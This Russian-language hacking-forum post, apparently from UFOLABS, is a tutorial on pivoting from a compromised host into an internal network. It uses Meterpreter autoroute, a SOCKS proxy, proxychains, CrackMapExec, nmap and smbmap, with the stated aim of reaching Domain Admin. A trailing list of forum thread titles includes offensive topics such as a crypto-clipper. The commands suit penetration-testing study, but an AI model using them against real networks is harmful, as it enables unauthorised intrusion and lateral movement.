Статья Сетевой пивитинг через CrackMapExec, Meterpreter и Proxychains

devqp

Специалист
Принцип работы
Техника пивитинга позволяет расширить доступ во внутреннюю сеть после получения первоначального Meterpreter-шелла. Комбинация CrackMapExec, Meterpreter и Proxychains обеспечивает инструментарий для перечисления и атаки защищенных сегментов.

Необходимые компоненты
Meterpreter shell: Установка через Metasploit Framework (
Код:
https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
)
Proxychains-ng:
Код:
sudo apt install proxychains
(
Код:
https://github.com/rofl0r/proxychains-ng
)
CrackMapExec: Требует предварительной настройки зависимостей

Установка CrackMapExec
Код:
sudo apt-get update
sudo apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
reset
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry shell
crackmapexec --help  # Проверка установки

Настройка Meterpreter для маршрутизации
Код:
bg  # Фоновый режим текущей сессии
use post/multi/manage/autoroute
set SESSION <id_сессии>
set SUBNET <целевая_подсеть>  # Пример: 192.168.133.0
set NETMASK /24  # Опционально
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
run  # Запуск SOCKS5-прокси

Конфигурация Proxychains
Редактирование /etc/proxychains.conf:
Код:
socks5 127.0.0.1 1080  # Добавить в конец файла
# Закомментировать другие прокси (socks4 и т.д.)

Эксплуатация внутренней сети
Примеры команд через proxychains:
Код:
proxychains crackmapexec smb 192.168.133.0/24
proxychains nmap -n -sT -sV -O -PN -p- 192.168.133.7
proxychains smbmap -H 192.168.133.10

Результат
Успешный пивитинг позволяет последовательно атаковать глубинную сеть, включая получение прав Domain Admin через компрометацию дополнительных систем.
 
Похожие темы
F Контроль сетевой активности Трафик: загрузки, инсталы, ads 0
M AutoRecon — многопоточный инструмент сетевой разведки Уязвимости и взлом 1
B Сетевой стек TCP/IP (2019) Полезные статьи 0
M Контроль сетевой активности Анонимность и приватность 0
G Окончательный FAQ по сетевой безопасности Полезные статьи 0
B Intercepter-NG [Многофункциональный сетевой снифер] Готовый софт 9
P Cканер сетевой безопасности Nmap 7 Новости в сети 0
devqp Статья Подключение к корпоративным VPN с Linux VPS через OpenConnect и VPN-Slice Полезные статьи 0
Admin UFOLABSNEWS Критическая уязвимость в Zimbra позволяет выполнять вредоносный код через письма. Новости в сети 0
Admin UFOLABSNEWS CISA подтвердила атаки через уязвимости в JoomShaper и Langflow. Новости в сети 0
devqp Статья Обход процедуры верификации InfraGard через компрометацию персональных данных Уязвимости и взлом 0
devqp Статья Автоматизация загрузки файлов с шифрованием через transfer.sh Полезные статьи 0
devqp Статья Блокировка WebRTC через UFW для защиты реального IP в Linux Анонимность и приватность 0
devqp Статья Создание анонимных аккаунтов Telegram через виртуальные номера и облачные эмуляторы Анонимность и приватность 0
devqp Статья Реализация крипто-клиппера с заменой адресов через расстояние Левенштейна Вирусология 0
devqp Статья Геофильтрация трафика на сервере CentOS через xt_geoip и iptables Полезные статьи 0
Admin UFOLABSNEWS Китайские хакеры атакуют университеты через уязвимости в почтовых серверах. Новости в сети 0
devqp Статья Универсальный системный промпт для кодинга через ИИ (Cursor/ChatGPT) Полезные статьи 0
Admin UFOLABSNEWS Хакеры получили доступ к переписке британских чиновников через уязвимость Fortinet. Новости в сети 0
Admin UFOLABSNEWS Новый Android-вирус RedWing предлагается в аренду через Telegram. Новости в сети 0
Admin UFOLABSNEWS Злоумышленники используют DEBULL для фишинга через Microsoft Device-Code Flow. Новости в сети 0
Admin UFOLABSNEWS Критическая уязвимость в Gitea позволяла получить административные права через подмену заголовков. Новости в сети 0
Admin UFOLABSNEWS Хакеры начали атаковать уязвимость в Adobe ColdFusion через два часа после публикации патча. Новости в сети 0
Admin UFOLABSNEWS Хакеры похитили 20 миллионов долларов через манипуляции с голосованием в BonkDAO. Новости в сети 0
Admin UFOLABSNEWS Anthropic тайно отслеживала пользователей из Китая через Claude Code. Новости в сети 0
Admin UFOLABSNEWS Луна медленно удаляется от Земли, а Солнце стареет — что ждёт нашу планету через миллиарды лет. Новости в сети 0
Admin UFOLABSNEWS Исследователи разработали метод TrojPix для утечки данных с изолированных систем через видеокабель. Новости в сети 0
Admin UFOLABSNEWS Минцифры может вернуть подтверждение действий через смс и мессенджер «Макс» в антифрод-пакет. Новости в сети 0
Admin UFOLABSNEWS Китайская группа Mustang Panda атаковала индийские госструктуры через подмену DLL. Новости в сети 0
Admin UFOLABSNEWS Вредонос Umbrij использует OAuth для доступа к Gmail через Google API. Новости в сети 0
Admin UFOLABSNEWS Вредонос ChocoPoc распространяется через троянизированные эксплойты на GitHub. Новости в сети 0
Admin UFOLABSNEWS Российские сервисы отключат вход через Apple ID и Google с 6 июля. Новости в сети 0
Admin UFOLABSNEWS Microsoft раскрыла масштабную атаку через вредоносные расширения в магазине Edge. Новости в сети 0
Admin UFOLABSNEWS Хакеры атакуют промышленные контроллеры Lantronix через критическую уязвимость. Новости в сети 0
Admin UFOLABSNEWS Украинские спецслужбы раскрыли кампанию российских хакеров по краже данных через фейковые SMS. Новости в сети 0
Admin UFOLABSNEWS Новая уязвимость в Linux позволяет получить права root через кэшированные бинарные файлы. Новости в сети 0
Admin UFOLABSNEWS Micron закрепила высокие цены на память до 2030 года через стратегические соглашения. Новости в сети 0
Admin UFOLABSNEWS Уязвимость PixelSmash в FFmpeg позволяет выполнять чужие команды через повреждённые видеофайлы. Новости в сети 0
Admin UFOLABSNEWS Обнаружена уязвимость Squidbleed, позволяющая утечку HTTP-запросов через прокси. Новости в сети 0
Admin UFOLABSNEWS Microsoft обнаружила уязвимость в AutoGen Studio, позволяющую взламывать компьютеры через ИИ-агента. Новости в сети 0
Admin UFOLABSNEWS GitHub стал платформой для распространения вредоносного ПО через поддельные репозитории. Новости в сети 0
Admin UFOLABSNEWS Перчатка ThermoPhy позволяет почувствовать данные через тепло. Новости в сети 0
Admin UFOLABSNEWS Positive Technologies представила платформу «Киберпогода» для прогнозирования атак через внешнюю бизнес-экосистему. Новости в сети 0
Admin Интересно Женщина рассказала о грабеже через Uber Eats. Новости в сети 0
Admin Интересно 144 пакета Mastra в npm скомпрометированы через взлом учётной записи разработчика. Новости в сети 0
Admin Интересно Хакеры заразили более 1,2 миллиона сайтов WordPress через популярные расширения. Новости в сети 0
Admin Интересно Лондонские власти борются с кражами телефонов через защиту устройств. Новости в сети 0
Admin Интересно Атака на цепочку поставок затронула популярные плагины WordPress через CDN Awesome Motive. Новости в сети 0
Admin Интересно Утечка данных Dynatrace через токен доступа в GitHub. Новости в сети 0
Admin Интересно Российским программистам предложили доступ к GitHub через государственный VPN. Новости в сети 0

Название темы